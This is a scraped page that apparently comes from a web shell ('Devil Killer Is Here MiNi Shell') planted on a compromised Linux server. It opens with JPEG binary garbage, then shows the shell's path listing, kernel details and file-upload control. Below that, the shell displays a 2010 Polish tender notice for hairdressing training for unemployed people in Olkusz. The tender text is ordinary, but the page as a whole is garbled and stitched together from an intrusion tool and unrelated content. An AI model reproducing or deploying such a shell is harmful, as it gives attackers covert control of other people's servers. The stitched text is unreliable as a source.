JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100423/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100423/96309-N-2010.html

<p class="kh_header"><b>Olkusz: Zorganizowanie i przeprowadzenie w granicach administracyjnych miasta Olkusza usługi szkolenia  w zakresie Fryzjer  dla 20 osób bezrobotnych w dwóch 10 - cio osobowych grupach w ramach Priorytetu VI  Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego Funduszu Społecznego  w ramach PO KL Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych.</b><br>
<b>Numer ogłoszenia: 96309 - 2010; data zamieszczenia: 23.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Minkiewicza 2, 32-300 Olkusz, woj. małopolskie, tel. 032 6434348, faks 032 6430538.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-olkusz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie w granicach administracyjnych miasta Olkusza usługi szkolenia  w zakresie Fryzjer  dla 20 osób bezrobotnych w dwóch 10 - cio osobowych grupach w ramach Priorytetu VI  Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego Funduszu Społecznego  w ramach PO KL Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zorganizowanie i przeprowadzenie w granicach administracyjnych miasta Olkusza usługi szkolenia  w zakresie Fryzjer dla 20 osób bezrobotnych w dwóch 10 - cio osobowych grupach w ramach Priorytetu VI  Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego Funduszu Społecznego  w ramach PO KL Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych.
2. Zamówienie ma być przeprowadzone zgodnie z programem szkolenia, który powinien uwzględniać  zróżnicowany poziom  umiejętności  i wiedzy uczestników szkolenia.
3. Program szkolenia winien  być opracowany w oparciu o rozporządzenie Ministra Edukacji i Nauki z dnia 03.02.2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych / Dz. U. Nr 31,  poz. 216/.
4. Program szkolenia winien  być opracowany zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 02.03.2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 47, poz. 315) powinien zawierać w szczególności:
a) nazwę i zakres szkolenia,
b) czas trwania i sposób organizacji szkolenia,
c) wymagania wstępne  dla uczestników szkolenia,
d) cele szkolenia,
e) plan nauczania  określający  tematy  zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem  części teoretycznej i części praktycznej,
f) treści  szkolenia  w zakresie poszczególnych zajęć edukacyjnych,
g) wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
h) sposób sprawdzania efektów szkolenia.
5. Wymagana liczba godzin usługi szkoleniowej wynosi 160 godzin zegarowych, w tym egzamin wewnętrzny  wliczony w liczbę godzin szkolenia. Za godzinę zegarową zajęć uznaje się zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut.
5.1. Minimalna liczba godzin szkoleniowych  w ciągu jednego dnia  ma wynosić sześć godzin zegarowych,  tygodniowo co najmniej 30 godzin zegarowych.
6. Program powinien obejmować następujące zagadnienia:
I. Działalność usługowa pracowni fryzjerskiej,
1) Marketing usług i obsługa klienta,
2) Organizowanie stanowiska pracy fryzjera,
II. Anatomia,  fizjologia, choroby włosów i skóry głowy,
III. Podstawowe materiały i narzędzia fryzjerskie i ich zastosowanie,
IV. Pielęgnacja i czesanie włosów,
V. Technologia fryzjerska,
1) Strzyżenie włosów i modelowanie,
2) Chemiczne zabiegi fryzjerskie,
3) Podstawy projektowania fryzur z elementami stylizacji fryzur.
Do powyższych tematów zajęć edukacyjnych należy  podać szczegółowe  treści szkolenia i wymiar godzin zajęć teoretycznych i praktycznych.
7. Celem szkolenia jest nabycie wiedzy teoretycznej i praktycznych umiejętności do pracy w zawodzie fryzjer.
8. Rezultaty szkolenia:
8.1. Po zakończeniu szkolenia uczestnicy uzyskają niezbędne umiejętności praktyczne, takie jak: 
1) znajomość technik pielęgnacji włosów,
2) umiejętność strzyżenia, 
3) umiejętność modelowania,
4) umiejętność koloryzacji włosów, 
5) umiejętność tworzenia baleage.
8.2. W wyniku realizacji szkolenia absolwent będzie potrafił:
1) diagnozować stan włosów na podstawie przeprowadzonego wywiadu, zgodnie z zasadami  postępowania fryzjerskiego,
2) zastosować urządzenia i sprzęt fryzjerski zgodnie z przeznaczeniem,
3) wykonywać zabiegi pielęgnacyjne włosów,
4) strzyc i modelować włosy przy pomocy różnych technik,
5) koloryzować włosy przy użyciu różnorodnych preparatów,
6) wykonywać baleage. 
9.  Szkolenie musi być zorganizowane i przeprowadzone w granicach administracyjnych miasta Olkusza.
10. Zajęcia muszą odbywać się w pomieszczeniu/ach/ dostosowanym/ych/ do prowadzenia zajęć    szkoleniowych i odpowiednio w tym celu wyposażonym/ych/ tj. w pomieszczeniach posiadających odpowiednie warunki  sanitarne, bezpieczeństwa, akustyczne i jakościowe. 
W przypadku zajęć praktycznych w pomieszczeniu/ach/ powinien znajdować się dostęp do ciepłej  i zimnej wody umożliwiający montaż myjki fryzjerskiej.
11. Wykonawca  podczas trwania szkolenia  zapewni prawidłowe  warunki pracy  zgodne  z przepisami BHP i p.poż.
12.Wykonawca zapewnia dla wszystkich uczestników szkolenia:
1) materiały dydaktyczne niezbędne przy realizacji szkolenia,
2) materiały ćwiczeniowe niezbędne przy realizacji szkolenia,
3) dla każdego uczestnika szkolenia  przybornik w skład którego wchodzą co najmniej: nożyczki , grzebień, 3 okrągłe szczotki do modelowania o zróżnicowanej szerokości,
4) materiały piśmiennicze.
Wykonawca musi zapewnić materiały i preparaty dla każdego z uczestników szkolenia w ilościach niezbędnych do pełnego zrealizowania programu szkolenia. 
Każdy uczestnik szkolenia ma mieć zapewnione oddzielne materiały i preparaty konieczne do wykonywania wszystkich przewidzianych programem szkolenia zabiegów. 
Po zakończeniu szkolenia materiały dydaktyczne, przybornik przechodzą na własność każdego z uczestników szkolenia.
Materiały biurowe i szkoleniowe opracowane przez wykładowców powinny zawierać logo EFS i Unii Europejskiej  oraz logo PO KL wraz z informacją: Projekt współfinansowany przez Unię Europejską  w ramach Europejskiego Funduszu Społecznego zgodnie z zasadą wizualizacji, a także informacje: Szkolenie: Fryzjer w ramach Priorytetu VI  Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego Funduszu Społecznego  w ramach PO KL Podziałanie 6.1.3. Poprawa zdolności do zatrudnienia oraz podnoszenie  poziomu aktywności  zawodowej osób bezrobotnych.  
13.Wymaga się prowadzenia dokumentacji przebiegu szkolenia stanowiącej:
a) dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych,
b) protokół z egzaminu,
c) rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji.
14. Na jednego  uczestnika  musi przypadać  jedno stanowisko  szkoleniowe.
15. Uczestnicy szkolenia powinni być objęci opieką z ramienia instytucji szkoleniowej. Każde szkolenie powinno mieć swojego opiekuna, osobę odpowiedzialną za organizację i realizację szkolenia, wskazaną do kontaktu w umowie  stanowiącej załącznik nr 8a do SIWZ.
16. Wykonawca w celu podnoszenia jakości prowadzonego szkolenia zobowiązany jest do zapewnienia nadzoru wewnętrznego.
17. Wykonawca jest zobowiązany do sprawdzania efektów szkolenia na poszczególnych jego etapach wybranymi przez siebie metodami, w tym poprzez egzamin wewnętrzny.
18. W ramach udzielonego zamówienia Wykonawca  zobowiązany jest  do zorganizowania egzaminu wewnętrznego ze zdobytej  wiedzy teoretycznej i praktycznej  oraz do wydania uczestnikom szkolenia dwóch  dokumentów potwierdzających zdobycie kwalifikacji:
1) zaświadczenia zgodnego z załącznikiem Nr 1 do Rozporządzenia Ministra Edukacji  i Nauki z dnia 03.02.2006 r. w sprawie uzyskania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności   i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216). 
Prosimy o nie zamieszczanie na w/w dokumencie żadnych dodatkowych znaków np. logo EFS, Unii Europejskiej, logo PO KL  itp.),
2) zaświadczenie, dyplom lub certyfikat o ukończeniu szkolenia zawierające logo EFS i Unii Europejskiej  oraz logo PO KL wraz z informacją: Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego zgodnie z zasadą wizualizacji, a także informacje: Szkolenie: Fryzjer w ramach Priorytetu VI Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego Funduszu Społecznego  w ramach PO KL  Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności  zawodowej osób bezrobotnych z zaznaczeniem, że uczestnicy kursu zastali na niego skierowani przez Powiatowy Urząd Pracy w Olkuszu.
Logo EFS i PO KL wraz z informacją: Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego do pobrania ze strony internetowej:
 www.pup-olkusz.pl/zalaczniki/logo_pokl_efs.jpg
19. Zamawiający nie dopuszcza możliwości prowadzenia szkolenia metodą  e- learning..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności objętych przedmiotem postępowania tj. posiadają aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez właściwy Wojewódzki Urząd Pracy, zgodnie z art. 20  ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008r. Nr 69 poz. 415 z późn. zm.) i  Rozporządzeniem MG i P  z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych. Ocena spełnienia warunku udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia potwierdzające jego spełnienie zgodnie z formułą spełnia / nie spełnia. Nie spełnienie  w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie tj. wykażą się przeprowadzeniem z należytą starannością co najmniej jednego szkolenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - o tematyce tożsamej z przedmiotem zamówienia.
Należy uwzględnić tylko szkolenia zawierające w programie min. 80 godz. zajęć dydaktycznych  obejmujących zarówno zagadnienia  teoretyczne oraz praktyczne z zakresu fryzjerstwa. Ocena spełnienia warunku udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia potwierdzające jego spełnienie zgodnie z formułą spełnia / nie spełnia. Nie spełnienie  w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia - Wykonawca będzie dysponował:  
1) minimum 5 stanowiskami pracy dla fryzjera wyposażonymi w co najmniej  fotel, lustro i suszarkę; 
2) 10 główkami treningowymi;
3) minimum 2 prostownicami;
4) minimum 2 lokówkami;
5) minimum 1 myjką fryzjerską;
6) minimum 2 sztukami nożyczek  degażówek;
7)odzieżą ochronną dla każdego uczestnika szkolenia.
Ocena spełnienia warunku udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia potwierdzające jego spełnienie zgodnie z formułą spełnia / nie spełnia. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami zdolnymi do wykonania zamówienia, z których każda musi posiadać co  najmniej:
a) łącznie  pięcioletni staż  pracy dydaktycznej związanej z  przedmiotem zamówienia;
b) ukończony kurs pedagogiczny, studium  pedagogiczne, studia pedagogiczne lub inny dokument uprawniający do prowadzenia zajęć;
c) w przypadku wykładowców prowadzących zajęcia praktyczne dodatkowo wymagane jest posiadanie tytułu mistrza w zawodzie fryzjera.
Ocena spełnienia warunku udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia potwierdzające jego spełnienie zgodnie z formułą spełnia / nie spełnia. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Ocena spełnienia warunku udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia potwierdzające jego spełnienie zgodnie z formułą spełnia / nie spełnia. Nie spełnienie  w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty potwierdzające, że usługa została wykonana należycie np. referencje, pochwały itp. (z wyłączeniem  dokumentów wystawionych Wykonawcy  przez Zamawiającego tj. PUP Olkusz) w oryginale lub w formie kserokopii potwierdzonych za zgodność z oryginałem podpisanych przez  osobę uprawnioną.Należy dołączyć  dokumenty poświadczające należyte wykonanie zamówienia  od co najmniej
jednego  Zamawiającego, u którego Wykonawca zrealizował  zamówienie  z wyłączeniem  dokumentów wystawionych Wykonawcy  przez Zamawiającego tj. PUP Olkusz.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. III.4. W zakresie wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22 ust. 1  ustawy: Zaświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art. 20 ustawy  z dnia 20 kwietnia 2004r.o promocji zatrudnienia i instytucjach rynku pracy i  Rozporządzeniem MG i P  z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych.
Instytucje szkoleniowe, które dokonały wpisu przed 2010 r. winny złożyć zaświadczenie potwierdzające kontynuację działalności szkoleniowej w roku bieżącym lub oświadczenie potwierdzające kontynuację działalności szkoleniowej w bieżącym roku. Zaświadczenie o wpisie do rejestru lub zaświadczenie potwierdzające kontynuację działalności szkoleniowej powinny być przedstawione w formie kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do podpisania oferty. Oświadczenie potwierdzające kontynuację działalności szkoleniowej w bieżącym roku powinno być przedstawione w formie oryginału i podpisane przez Wykonawcę lub osobę upoważnioną do podpisania oferty.
2) III.4.2 W celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą:
Pisemne oświadczenie o nie zaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne stanowiące załącznik nr 9 do SWIZ, przedstawione w formie oryginału i podpisane przez Wykonawcę lub inną osobę upoważnioną do podpisania oferty. Zamawiający może żądać na wniosek okazania w/ w dokumentów w ciągu 14 dni. W przypadku zażądania przez Zamawiającego w/ w dokumentów winny one być  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3) III.4.3. Dokumenty podmiotów zagranicznych: Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie 6.4.1. SIWZ zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Daty wystawienia stosuje się odpowiednio. Jeżeli dokumenty wyżej wymienione Wykonawca składa  w języku obcym, należy również złożyć tłumaczenie na język polski, poświadczone przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie Wykonawcy w prowadzeniu szkoleń - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość  zmiany  postanowień  umowy, której wzór stanowi załącznik nr 8a do SIWZ  w przypadku:
1) zmiany  terminu przeprowadzenia szkolenia  - w obrębie 1- go miesiąca  dla danej grupy,
2) zmiany wykładowcy wynikającej  z przyczyn losowych ( za zgodą Zamawiającego ),
3) zmiany miejsca szkolenia ( za zgodą Zamawiającego ).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-olkusz.pl<br>
